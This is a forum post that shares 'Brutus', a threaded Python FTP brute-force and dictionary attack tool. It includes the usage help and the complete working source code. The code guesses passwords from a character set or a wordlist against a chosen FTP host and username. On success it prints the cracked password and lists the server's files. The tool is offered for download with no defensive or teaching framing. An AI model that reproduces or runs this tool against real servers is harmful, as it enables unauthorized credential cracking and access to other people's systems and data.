Active Members Fi8sVrs Posted September 8, 2017 Active Members Report Share Posted September 8, 2017 (edited) Brutus is a small threaded python FTP brute-force and dictionary attack tool. It supports several brute-force parameters such as a custom character sets, password length, minimum password length, prefix, and postfix strings to passwords generated. Download brutus-0.3.py Usage: usage: brutus.py [-h] [-w WORDLIST] [-c CHARSET] [-l [LENGTH]] [-m [MINLENGTH]] [-r PREFIX] [-o POSTFIX] [-p [PAUSE]] [-t [THREADS]] [-v [VERBOSE]] host username positional arguments: host FTP host username username to crack optional arguments: -h, --help show this help message and exit -w WORDLIST, --wordlist WORDLIST wordlist of passwords -c CHARSET, --charset CHARSET character set for brute-force -l [LENGTH], --length [LENGTH] password length for brute-force -m [MINLENGTH], --minlength [MINLENGTH] Minimum password length -r PREFIX, --prefix PREFIX prefix each password for brute-force -o POSTFIX, --postfix POSTFIX postfix each password for brute-force -p [PAUSE], --pause [PAUSE] pause time between launching threads -t [THREADS], --threads [THREADS] num of threads -v [VERBOSE], --verbose [VERBOSE] verbose output Mirror: ################################################################################ # tool: Brutus - FTP Brute-Force/Dictionary Attack Tool # version: 0.3 # email: mrh@bushisecurity.com # www: bushisecurity.com/brutus/ ################################################################################ # MIT License # Copyright (c) 2017 Phillip Aaron # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal# # in the Software without restriction, including without limitation the rights# # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell# # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import argparse, sys, threading, time from datetime import datetime from itertools import chain, product from ftplib import FTP # Create some global variables class glob: pwd = False # Used for stopping attack when password found chrset = "" # Character set for brute-force prefix = "" # Prefix string postfix = "" # Postfix string length = 8 # Default lenth of password minlength = 5 # Default min length of password thrds = 10 # Defualt num of threads verb = False # Default value for verbose output pause = 0.01 # Default throttle time, 1 = one second cnt = 0 # Counting number of attempts # Iterable Method for brute-forcing a character set and length def bruteforce(charset, maxlength, minlength): return (''.join(candidate) for candidate in chain.from_iterable(product(charset, repeat=i) for i in range(minlength, maxlength + 1))) # Method for making ftp connections def crack(host, user, pwd): try: if glob.verb: # Check for verbose output print "[" + str(glob.cnt) + "] Trying: " + pwd.strip() ftp = FTP(host) # Create FTP object if ftp.login (user, pwd): # Check if true print "\nPassword for " + user + ": " + pwd.strip() print "==================================================" glob.pwd = True # Set global value print ftp.dir() # Display contents of root FTP ftp.quit() # Disconnect from FTP except Exception as err: pass # Ignore errors # Method wait for threads to complete def wait(threads): for thread in threads: thread.join() # Method for staging attack def main(args): try: start = datetime.now() # Time attack started print "\nAttacking FTP user [" + args.username + "] at [" + args.host + "]" print "==================================================" thrdCnt = 0;threads = [] # Local variables # Set global variables if args.pause:glob.pause = float(args.pause) if args.verbose:glob.verb = True if args.threads:glob.thrds = int(args.threads) if args.length:glob.length = int(args.length) if args.minlength:glob.minlength = int(args.minlength) if args.charset:glob.chrset = args.charset if args.prefix:glob.prefix = args.prefix if args.postfix:glob.postfix = args.postfix if args.charset == None: # Create charset from printable ascii range for char in range(37,127):glob.chrset += chr(char) # Brute force attack if args.wordlist == None: for pwd in bruteforce(glob.chrset, int(glob.length),int(glob.minlength)): # Launch brute-force if glob.pwd: break # Stop if password found if thrdCnt != args.threads: # Create threads until args.threads if args.prefix: pwd = str(args.prefix) + pwd if args.postfix: pwd += str(args.postfix) thread = threading.Thread(target=crack, args=(args.host,args.username,pwd,)) thread.start() threads.append(thread) thrdCnt += 1;glob.cnt+=1 time.sleep(glob.pause) # Set pause time else: # Wait for threads to complete wait(threads) thrdCnt = 0 threads = [] # Dictionary attack else: with open(args.wordlist) as fle: # Open wordlist for pwd in fle: # Loop through passwords if glob.pwd: break # Stop if password found if thrdCnt != args.threads: # Create threads until args.threads thread = threading.Thread(target=crack, args=(args.host,args.username,pwd,)) thread.start() threads.append(thread) thrdCnt +=1;glob.cnt+=1 time.sleep(glob.pause) # Set pause time else: wait(threads) # Wait for threads to complete thrdCnt = 0 threads = [] except KeyboardInterrupt: print "\nUser Cancelled Attack, stopping remaining threads....." wait(threads) # Wait for threads to complete sys.exit(0) # Kill app wait(threads) # Wait for threads to complete stop = datetime.now() print "==================================================" print "Attack Duration: " + str(stop - start) print "Attempts: " + str(glob.cnt) + "\n" if __name__ == "__main__": # Declare an argparse variable to handle application command line arguments parser = argparse.ArgumentParser() parser.add_argument("host", action="store", help="FTP host") parser.add_argument("username", action="store", help="username to crack") parser.add_argument("-w", "--wordlist", action="store", help="wordlist of passwords") parser.add_argument("-c", "--charset", action="store", help="character set for brute-force") parser.add_argument("-l", "--length", action="store", help="password length for brute-force", nargs='?', default=8, const=8, type=int) parser.add_argument("-m","--minlength", action="store", nargs='?', default=1, const=1, help="Minimum password length", type=int) parser.add_argument("-r","--prefix", action="store", help="prefix each password for brute-force") parser.add_argument("-o","--postfix", action="store", help="postfix each password for brute-force") parser.add_argument("-p", "--pause", action="store", help="pause time between launching threads", nargs='?', default=0.01, const=0.01) parser.add_argument("-t", "--threads", action="store", help="num of threads", nargs='?', default=10, const=10, type=int) parser.add_argument("-v", "--verbose", action="store", help="verbose output", nargs='?', default=False, const=True) # Show help if required arg not included if len(sys.argv[1:])==0: parser.print_help() parser.exit() args = parser.parse_args() if args.minlength != None or args.length != None: if args.minlength > args.length: print "\n** Argument Logic Error **" print "Minimum password length [-m "+str(args.minlength)+"] is greater than Password length [-l "+str(args.length)+"]\n" parser.print_help() parser.exit() main(args) Source Edited September 8, 2017 by Fi8sVrs 2 Quote Link to comment Share on other sites More sharing options...
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Active Members Fi8sVrs Posted September 8, 2017 Author Active Members Report Share Posted September 8, 2017 (edited) done. Edited September 8, 2017 by Fi8sVrs edit 1 Quote Link to comment Share on other sites More sharing options...